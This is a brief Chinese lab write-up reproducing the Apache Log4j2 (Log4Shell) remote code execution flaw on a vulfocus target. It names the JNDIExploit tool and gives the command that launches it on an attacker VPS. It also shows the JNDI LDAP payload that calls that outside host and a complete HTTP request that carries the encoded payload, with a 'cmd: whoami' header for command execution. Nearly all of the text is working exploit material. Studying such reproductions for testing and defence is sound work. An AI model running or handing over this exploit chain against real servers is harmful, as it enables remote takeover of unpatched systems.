Apache Log4j2远程代码执行漏洞

工具

https://github.com/WhiteHSBG/JNDIExploit
-u查看用法
image.png

复现(vulfocus)

vps执行命令

  1. java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 101.35.17.6

image.png

payload

  1. ${jndi:ldap://101.35.17.6:1389/TomcatBypass/TomcatEcho}
  1. GET /hello?payload=%24%7bjndi%3aldap%3a%2f%2f101.35.17.6%3a1389%2ftomcatbypass%2ftomcatecho%7d HTTP/1.1
  2. Host: 123.58.224.8:33407
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Upgrade-Insecure-Requests: 1
  9. cmd:whoami